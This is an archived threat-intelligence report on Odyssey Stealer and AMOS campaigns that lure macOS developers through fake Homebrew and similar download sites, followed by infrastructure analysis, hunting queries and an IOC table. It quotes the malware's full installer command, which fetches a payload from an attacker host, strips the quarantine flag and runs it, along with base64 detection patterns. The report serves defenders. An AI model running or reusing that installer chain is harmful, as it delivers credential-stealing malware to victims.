{
	"id": "71bce997-7708-401f-9105-c6784dfc2df6",
	"created_at": "2026-04-06T00:15:00.50752Z",
	"updated_at": "2026-04-10T13:12:03.438636Z",
	"deleted_at": null,
	"sha1_hash": "d2187fee126028c218a8a4a9f07f6d8b453bb01a",
	"title": "Odyssey Stealer \u0026 AMOS Hit macOS Developers with Fake Homebrew Sites",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2653144,
	"plain_text": "Odyssey Stealer \u0026 AMOS Hit macOS Developers with Fake\r\nHomebrew Sites\r\nPublished: 2025-10-16 · Archived: 2026-04-05 22:32:01 UTC\r\nIn recent months, our threat hunting team has observed a surge in macOS-targeted campaigns employing new\r\nsocial engineering tactics and persistent infrastructure.\r\nThis operation stands out for its focus on the developer community, leveraging trust in common tools and open-source platforms to lure victims into executing malicious code. Rather than relying on brute force or zero-day\r\nexploits, the operators use finely crafted deception: fake download portals, clipboard manipulation, and command\r\nobfuscation.\r\nThis report explains how those techniques deliver Odyssey Stealer and AMOS, and maps the related\r\ninfrastructure, domains, and payload behavior.\r\nKey Takeaways\r\nMain findings from the campaign:\r\nThe campaign targets macOS users, particularly developers, through fake software download websites\r\nimpersonating trusted platforms such as Homebrew, TradingView, and LogMeIn.\r\nAttackers use social engineering by prompting visitors to paste base64-encoded commands in Terminal,\r\nwhich download a secondary payload from remote infrastructure.\r\nThe downloaded payload installs either Odyssey Stealer or AMOS (Atomic macOS Stealer), both capable\r\nof harvesting system information, browser data, and cryptocurrency credentials.\r\nMore than 85 phishing domains were identified, connected through shared SSL certificates, payload\r\nservers, and reused infrastructure.\r\nThe infrastructure includes long-standing IP addresses (93.152.230[.]79 and 195.82.147[.]38) registered\r\nunder a personal name, showing signs of multi-year activity and infrastructure reuse.\r\nThe findings suggest a coordinated and ongoing campaign in which operators continuously adapt their\r\ninfrastructure and tactics to maintain persistence and evade detection within the macOS ecosystem.\r\nThese findings began with a single lead that pointed to the first infrastructure node.\r\nInitial Discovery\r\nThe investigation began when cybersecurity researcher Raaz (@solostalking) publicly shared evidence of several\r\nfake websites distributing Odyssey Stealer targeting macOS users. The post drew attention to multiple suspicious\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 1 of 22\n\ndomains and revealed a particularly significant detail: an IP address (93.152.230[.]79) observed in passive DNS\r\nreplication records, suggesting it was part of the campaign's operational infrastructure.\r\nThe impersonated platforms stood out. These were not random selections; the sites were crafted to mimic\r\nHomebrew, one of the most trusted and widely used package managers in the macOS developer community.\r\nAmong the domains identified were:\r\nhomebrewonline[.]org\r\nhomebrewupdate[.]org\r\nlogmeeine[.]com\r\nPassive DNS data showed these domains were part of an interconnected network. This finding suggested that the\r\nexposed servers likely supported additional, undiscovered phishing or distribution sites operating under the same\r\nmalicious infrastructure.\r\nThe discovery served as the foundation for our subsequent technical analysis, which focused on identifying\r\ndomain overlaps, encoded payloads, and behavioral indicators linking this activity across multiple campaigns.\r\nFigure 1: Fake Homebrew and LogMeIn download pages used to distribute Odyssey Stealer.\r\nFrom there, we examined the supporting infrastructure.\r\nInfrastructure Analysis and Reuse\r\nFollowing the identification of the suspicious IP address 93.152.230[.]79 originally linked to fake Homebrew\r\ndownload sites by researcher Raaz (@solostalking), our team conducted a deeper investigation into the underlying\r\ninfrastructure. What began as a routine IP lookup quickly uncovered signs of a broader and more organized\r\nnetwork supporting malicious distribution activity.\r\nThe lookup immediately raised several red flags. Unlike legitimate development or hosting environments that\r\ntypically rely on major providers such as AWS, Google Cloud, or Microsoft Azure, this host was registered under\r\nan individual named Shereverov Marat Ahmedovich, based in Helsinki, Finland.\r\nThis registration detail is unusual. Legitimate organizations rarely operate production servers under personal\r\nnames, especially when impersonating well-known open-source projects like Homebrew. The irregular\r\nregistration, combined with the \"High Risk\" reputation label assigned by Hunt.io, is consistent with prior abusive\r\nactivity observed on this host.\r\nFigure 2: Hunt.io infrastructure view of IP 93.152.230[.]79 showing active services.\r\nFurther inspection of historical service records revealed multiple active network services running on the same\r\nhost:\r\nPort 80 (HTTP) has been active since September 2023, likely serving phishing or payload delivery pages.\r\nPort 22 (SSH) has also been active since September 2023, suggesting direct administrative access for\r\nremote control or maintenance.\r\nPort 21 (FTP) was first observed in July 2025, potentially used for hosting or transferring payload\r\ncomponents.\r\nThe combination of web, SSH, and FTP services persisting across multiple years suggests this server functioned\r\nas a central hub for both command-and-control and payload distribution within the broader campaign\r\ninfrastructure.\r\nThe introduction of FTP services in mid-2025 aligns with the period during which Odyssey Stealer activity\r\nnotably increased. While this alignment is\r\nnot definitive proof of direct linkage, it strengthens the hypothesis that the same infrastructure evolved to support\r\nthe expanding campaign.\r\nFigure 3: Timeline of IP 93.152.230[.]79 showing persistent activity since 2023.\r\nFurther analysis showed that the host also exposed email services on ports 993 (IMAPS) and 995 (POP3S), both\r\nsecured with SSL certificates issued to trading.example.com.\r\nThe presence of mail services on this infrastructure is notable: these services could have been used for credential harvesting, phishing, or as auxiliary\r\ndistribution channels for malicious payloads.\r\nIn addition, port 8888 was observed serving a web management interface tied to FASTPANEL, a control panel\r\ncommonly used for managing multiple domains from a single administrative console. Each service returned a\r\ndistinct JARM fingerprint, suggesting custom configurations per service rather than a standardized, mass-deployed setup.\r\nTogether, the data shows a multi-purpose server environment supporting several campaigns.\r\nPivoting on the certificate issued to trading.example.com uncovered a second host, 195.82.147[.]38,\r\npresenting the same SSL certificate on identical IMAPS and POP3S ports. This certificate reuse links the two servers; it is a common operational security oversight that exposes related infrastructure within a threat\r\nnetwork.\r\nHunt.io records show this second IP began using the certificate in June 2025, suggesting it may have served as a\r\nbackup or migration node as the campaign expanded. The repeated use of the same certificate across hosts\r\nreinforces the assessment that operators reused existing infrastructure instead of deploying new systems for each\r\nphase of activity.\r\nFigure 4: SSL correlation linking IPs via reused trading.example.com certificate.\r\nCollectively, the findings show that the operators maintain a small set of multi-purpose servers that support\r\ndifferent campaigns over time. Rather than building new environments, they adapt existing infrastructure by\r\nreusing domains, certificates, and hosting services. This reuse pattern demonstrates persistence and operational\r\nefficiency within their macOS-targeted distribution ecosystem.\r\nDomain Analysis and Social Engineering Themes\r\nDuring the investigation into the IP addresses 93.152.230[.]79 and 195.82.147[.]38, a pattern of domain\r\nregistrations emerged linking back to the same infrastructure. Historical DNS data revealed several domains that\r\nresolved to these servers at different times, many of which were designed to impersonate legitimate software or\r\ntrading platforms. This demonstrates a consistent reliance on social engineering as part of the attackers'\r\ndistribution strategy.\r\nThe identified domains include:\r\nhomebrewclubs[.]org\r\nhomebrewfaq[.]org\r\nhomebrewonline[.]org\r\nhomebrewupdate[.]org\r\nlogmeln[.]com\r\nlogmeeine[.]com\r\ntradingviewen[.]com\r\nsites-phantom[.]com\r\nfilmoraus[.]com\r\nSeveral of these domains closely mimic legitimate brands, particularly the Homebrew project, which aligns with\r\nthe fake developer tool distribution tactic seen in the Odyssey Stealer campaign. Others, such as the fake LogMeIn\r\nand TradingView domains, indicate the operators may be targeting a broader set of users, potentially extending\r\ninto the financial sector.\r\nOverlapping Infrastructure Indicators\r\nFurther analysis revealed overlapping SSL certificates, similar JARM fingerprints, and shared resolution histories\r\nbetween these domains. These technical overlaps reinforce the assessment that the same group is behind multiple\r\ncampaigns leveraging a shared infrastructure base.\r\nBrand impersonation, infrastructure reuse, and varied configurations indicate an operation capable of running parallel or\r\nevolving activity.\r\nFigure 5: Fake Homebrew phishing site tricking macOS developers into installing malware.\r\nThe page's JavaScript is engineered to covertly place a base64-encoded installation command into the user's\r\nclipboard when the visible \"Copy\" button is clicked. To discourage manual inspection, the code disables text\r\nselection and the context menu within the install block, making it harder for users to view the raw string.\r\nWhen decoded, the clipboard contents reveal a curl command that fetches a remote script over HTTP and executes\r\nit via bash in the background. After each copy interaction, the script issues a JSON POST to notify.php,\r\nenabling the operators to track engagement and identify users who completed the copy step.\r\nThe page also uses click-manipulation (ClickFix) techniques to nudge users into pasting and running the encoded\r\ncommand, turning an apparently benign convenience feature into an effective social-engineering vector.\r\nFigure 6: Malicious JavaScript copying hidden base64 curl command to the clipboard.\r\nTo measure the scale, we executed a structured hunt to identify web pages embedding the encoded curl -s\r\ninstallation pattern. Using the query below, we searched across collected web data for base64 fragments consistent\r\nwith the malicious installer:\r\nSELECT\r\n hostname\r\nFROM\r\n crawler\r\nWHERE\r\n (\r\n body LIKE '%Y3VybCAtcy%'\r\n OR body LIKE '%AgYmFzaCAm%'\r\n )\r\n AND timestamp gt '2025-05-01'\r\nThis hunt returned 85 unique hostnames, revealing widespread reuse of the same base64-encoded payload across\r\nmultiple websites since May 1, 2025. The results show operators relying on centralized payload infrastructure.\r\nFigure 7: Hunt.io results revealing 85 phishing domains using the same installer.\r\nAfter collecting all encoded installation commands and removing duplicates, we decoded each payload to extract\r\nthe underlying delivery URLs and associated IP addresses. The decoded results clustered into several recurring\r\npath patterns, for example, /d/vipx and /d/roberto, and pointed to a small group of hosting servers.\r\nThis uniformity points to a centralized payload infrastructure that supports numerous phishing pages\r\nsimultaneously, rather than isolated one-off deployments, and to an efficient, stable backend that the\r\nactors rely on.\r\nFigure 8: Decoded shell commands delivering Odyssey Stealer payloads.\r\nTo identify phishing pages embedding Odyssey Stealer command-and-control (C2) information, we performed a\r\ntargeted query across our web-crawler dataset. The objective was to locate HTML pages containing known\r\nbase64-encoded or plaintext representations of C2 IP addresses and domains.\r\nSELECT\r\n hostname\r\nFROM\r\n crawler\r\nWHERE\r\n (\r\n body LIKE '%NDUuMTQ2LjEzMC4xMzI%'\r\n OR body LIKE '%NDUuMTQ2LjEzMC4xMzE%'\r\n OR body LIKE '%MTg1LjkzLjg5LjYy%'\r\n OR body LIKE '%NDUuMTM1LjIzMi4zMw%'\r\n OR body LIKE '%b2R5c3NleTEudG8%'\r\n OR body LIKE '%b2R5c3NleS1zdC5jb20%'\r\n OR body LIKE '%NS4xOTkuMTY2LjEwMg%'\r\n OR body LIKE '%ODMuMjIyLjE5MC4yMTQ%'\r\n OR body LIKE '%MTk0LjI2LjI5LjIxNw%'\r\n OR body LIKE '%MTg1LjE0Ny4xMjQuMjEy%'\r\n OR body LIKE '%ODguMjE0LjUwLjM%'\r\n )\r\n AND timestamp gt '2025-01-01'\r\nLIMIT 10\r\nThe search matched multiple encoded indicators such as NDUuMTQ2LjEzMC4xMzI and b2R5c3NleTEudG8 while\r\nrestricting results to samples observed after January 1, 2025, ensuring focus on active infrastructure.\r\nThe resulting hostnames were manually reviewed, and where applicable, the associated pages were fetched for\r\nboth static and dynamic payload analysis. This process effectively distilled a large corpus of web data into a high-value subset of phishing pages directly linked to known Odyssey Stealer infrastructure, enabling precise tracking\r\nof ongoing distribution activity.\r\nFigure 9: Search results showing encoded C2 IPs tied to Odyssey Stealer.\r\nAfter mapping the domain ecosystem, we analyzed how these sites functioned in practice to deliver the payloads.\r\nClickFix-style Fake macOS Download Site Delivering AMOS Stealer\r\nThis is a fake macOS download page crafted to look like a legitimate software portal. It headlines \"Download for\r\nmacOS\" and displays a phony \"Verified Publisher\" badge to create a false sense of trust.\r\nInstallation instructions and separate .dmg buttons for different macOS versions add to the page's authenticity, and\r\ndemo videos and UI polish mimic legitimate developer pages (GitHub-style) to make the lure more convincing.\r\nThe page's goal is social engineering: trick users into pasting and executing a hidden, malicious command.\r\nFigure 10: Fake \"Download for macOS\" portal featuring false trust badges.\r\nA closer look at the fake installer pages reveals how users are tricked into executing malicious commands.\r\nHidden Curl Payload Copied to Clipboard\r\nWhen a user clicks the \"Copy\" button, the page's JavaScript writes a base64-encoded curl command into the\r\nclipboard, priming victims to paste and run it in Terminal. The script includes a fallback using\r\ndocument.execCommand('copy') for older browsers and immediately replaces the button text with a confirmation\r\nto reassure the user. It appears convenient, but the copied string hides a payload URL: users think they are\r\ncopying an installer command, not a link to a malicious script.\r\nThe page also loads analytics and media assets to look legitimate and to track engagement. Combined, these\r\nbehaviors turn a single click into a reliable infection vector by nudging users to execute the decoded install.sh.\r\nFigure 11: ClickFix JavaScript writing the malicious curl payload to clipboard.\r\nTo understand how widespread this technique was, we searched for similar encoded payload patterns across other\r\npages.\r\nIdentifying Pages Embedding Base64-Encoded Payloads\r\nOur team created an SQL rule to detect phishing websites that embed malicious scripts.\r\nThe query searches crawler data for pages containing both the base64 fragment 5zaA== and the shell command\r\npattern $(curl), focusing on records collected after May 1, 2025.\r\nSELECT\r\n *\r\nFROM\r\n crawler\r\nWHERE\r\n body LIKE '%5zaA==%'\r\n AND body LIKE '%$(curl%'\r\n AND timestamp gt '2025-05-01'\r\nThis combination helps identify pages hosting encoded payloads or copy/paste commands used to fetch and\r\nexecute remote content, as the following screenshot shows.\r\nFigure 12: SQL hunt results identifying phishing sites embedding encoded payloads.\r\nFollowing that trail led us to the installer script itself and the sequence it uses to deploy the payload.\r\nInstaller Retrieval \u0026 Behavior\r\nThe phishing page fetches a small installer script (install.sh) from https://bonoud.com/get3/install.sh\r\nand runs it as part of the bogus install flow. That installer contains a short sequence that downloads a payload into\r\n/tmp/update, clears macOS extended attributes, makes the file executable, and then runs it. In plain terms, the\r\nscript executes:\r\ncurl -o /tmp/update https://bonoud.com/get6/update; xattr -c /tmp/update; chmod +x /tmp/update;\r\n/tmp/update\r\nClearing extended attributes with xattr -c is commonly used to remove the macOS quarantine flag and bypass\r\nGatekeeper prompts, allowing the binary to run without a user warning.\r\nFrom there, we analyzed how the payload executes, hides its activity, and maintains persistence.\r\nExecution and Obfuscation Flow\r\nThe sample payload demonstrates a staged macOS threat that combines environment fingerprinting, privilege\r\nescalation attempts, system enumeration, and service manipulation.\r\nThe overall behavior indicates an actor focused on evasion, gaining elevated privileges, collecting host details to\r\ninform follow-on actions, and disrupting backup or sync mechanisms to hinder recovery and detection.\r\nInitial execution is conducted through a layered shell invocation pattern: /bin/sh spawns /bin/bash, which\r\ninvokes sudo to run /bin/zsh. Finally, it executes the payload from a user-writable path.\r\nThis multi-interpreter chain is consistent with obfuscation tactics designed to complicate process tracing and\r\nevade simple behavioral detections. Running the payload from /Users/run/... rather than a standard system\r\nlocation further suggests that the operator prefers user-space staging to reduce the chance of triggering signature-based controls that focus on system directories.\r\nOne of the most notable stages in that execution chain involves attempts to gain elevated privileges on the system.\r\nPrivilege Escalation Attempts\r\nThe payload explicitly attempts to escalate privileges by invoking sudo /bin/zsh -c /Users/run/\u003cpayload\u003e.\r\nThis indicates the malware either relies on the presence of an admin account or attempts to exploit sudo\r\nconfiguration weaknesses (for example, cached credentials or overly permissive sudoers entries).\r\nElevated privileges would allow the actor to write to protected locations, modify system-wide configurations, and\r\nhide or remove forensic artifacts, so the presence of such sudo invocations should be treated as a high-priority\r\nalert.\r\nFigure 13: Execution trace showing AMOS Stealer privilege escalation via sudo.\r\nAnti-Analysis and Sandbox Checks\r\nBefore execution, the malware performs anti-analysis checks using AppleScript (osascript) to call\r\nsystem_profiler for both memory and hardware data, verifying whether it is running inside a virtualized or\r\nanalysis environment.\r\nThe script searches for virtualization markers such as \"QEMU\", \"VMware\", or \"KVM\", specific hardware serials\r\nand model identifiers, and other signs like \"Chip: Unknown\" or \"Intel Core 2\"; if any indicator is found, the script\r\nexits with code 100.\r\nThis termination behavior indicates an attempt to avoid running in virtualized analysis environments or on lab\r\nhardware; the payload will alter or abort its behavior when it believes it is being observed.\r\nFigure 14: AppleScript anti-analysis logic detecting virtual machines pre-execution.\r\nOnce the checks pass, the malware begins profiling the host and interacting with system services to avoid\r\ndetection.\r\nService Manipulation and Stealth\r\nIn addition to virtualization checks, the payload uses system_profiler SPMemoryDataType and system_profiler\r\nSPHardwareDataType to collect detailed hardware and memory information.\r\nThis enumeration provides model identifiers, serial numbers, CPU type, and RAM details that the operator can use\r\nto profile the victim environment, either to decide whether to continue, to tailor subsequent payload stages, or to\r\nreport environment metadata back to a command-and-control server.\r\nThis telemetry can guide target selection and help avoid low-value environments.\r\nFigure 15: macOS profiling commands fingerprinting infected hosts.\r\nAs part of its disruptive and stealthy behavior, the malware issues launchctl kill SIGTERM commands targeting\r\nMicrosoft OneDrive updater daemons. Terminating OneDrive update or sync processes is consistent with an intent\r\nto disrupt cloud backup and synchronization, which can reduce the victim's ability to recover files or detect\r\nchanges via cloud logs.\r\nThe sample also interacts with macOS XPC services by launching or invoking components such as nsurlstoraged\r\nand CoreSpotlightService via xpcproxy, a behavior that can serve to blend malicious activity into legitimate\r\nsystem processes or to leverage trusted services for persistence, inter-process communication, or re-triggering\r\nafter reboot.\r\nFigure 16: Malware interacting with XPC services like nsurlstoraged for stealth.\r\nBased on these behaviors, the following measures can reduce risk.\r\nMitigation Strategies\r\nNetwork \u0026 domain controls: block known malicious domains/IPs at DNS and proxy; monitor outbound\r\nrequests to newly registered hosts and known payload paths.\r\nEndpoint hardening: enable Gatekeeper/notarization and restrict script execution from /tmp and user-writable paths via MDM/EDR policies.\r\nLeast privilege \u0026 sudo policies: remove passwordless sudo and limit admin accounts; require explicit\r\napproval or MFA for privileged operations.\r\nHunting \u0026 detection: hunt for base64 clipboard fragments and sequences like xattr -c; chmod +x\r\nfollowed by executions from /tmp; correlate with SSL reuse and hosting IPs.\r\nUser awareness: instruct developers never to paste commands from untrusted sites and to verify installers from official\r\nrepos; provide vetted internal mirrors.\r\nNetwork egress \u0026 proxying: force web egress through a proxy with content inspection and block direct\r\ncurl/wget to unapproved destinations.\r\nIncident response: isolate suspected hosts, preserve memory and logs, and collect installer scripts and\r\ncrawled HTML for forensics.\r\nTakedown \u0026 intel sharing: share IOCs with registrars and industry partners and request takedowns;\r\nupdate blocklists and threat feeds promptly.\r\nConclusion\r\nThe Odyssey Stealer and AMOS campaign highlights how attackers continue to exploit developer trust in both\r\nopen-source and commercial tools to spread macOS malware. By reusing infrastructure, certificates, and familiar\r\ndownload themes, they blur the line between legitimate and malicious software.\r\nAs these tactics evolve, visibility into domain overlap, encoded payloads, and reused certificates becomes critical\r\nfor early detection and response.\r\nIf you want to stay ahead of campaigns like this, book a Hunt.io demo and see how our platform helps uncover\r\nhidden macOS threat infrastructure before it strikes.\r\nThe following indicators of compromise (IOCs) summarize infrastructure and domains identified during this\r\ncampaign.\r\nOdyssey Stealer \u0026 AMOS IOCs\r\nType | IOC | Description | Use Context\r\nIP | 93.152.230[.]79 | Backend hosting/phishing infrastructure. | Passive DNS; linked to fake Homebrew sites\r\nIP | 195.82.147[.]38 | Secondary host linked via the same SSL certificate. | Certificate reuse (trading.example.com)\r\nDomain | homebrewonline[.]org | Fake Homebrew phishing domain (payload delivery). | Identified in passive DNS\r\nDomain | homebrewupdate[.]org | Fake Homebrew phishing domain. | Identified in passive DNS\r\nDomain | homebrewclubs[.]org | Fake Homebrew phishing domain. | Historical DNS resolved to infra\r\nDomain | homebrewfaq[.]org | Fake Homebrew phishing domain. | Historical DNS resolved to infra\r\nDomain | logmeln[.]com | Fake LogMeIn phishing domain. | Identified during domain enumeration\r\nDomain | logmeeine[.]com | Fake LogMeIn phishing domain (typosquat). | Identified during domain enumeration\r\nDomain | tradingviewen[.]com | Fake TradingView phishing domain. | Identified during domain enumeration\r\nDomain | sites-phantom[.]com | Phishing/impersonation domain. | Identified during domain enumeration\r\nDomain | filmoraus[.]com | Phishing/impersonation domain. | Identified during domain enumeration\r\nWe will keep monitoring for domain reuse and certificate overlap to surface the next wave of activity.\r\nSource: https://hunt.io/blog/macos-odyssey-amos-malware-campaign",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://hunt.io/blog/macos-odyssey-amos-malware-campaign"
	],
	"report_names": [
		"macos-odyssey-amos-malware-campaign"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434500,
	"ts_updated_at": 1775826723,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2187fee126028c218a8a4a9f07f6d8b453bb01a.pdf",
		"text": "https://archive.orkl.eu/d2187fee126028c218a8a4a9f07f6d8b453bb01a.txt",
		"img": "https://archive.orkl.eu/d2187fee126028c218a8a4a9f07f6d8b453bb01a.jpg"
	}
}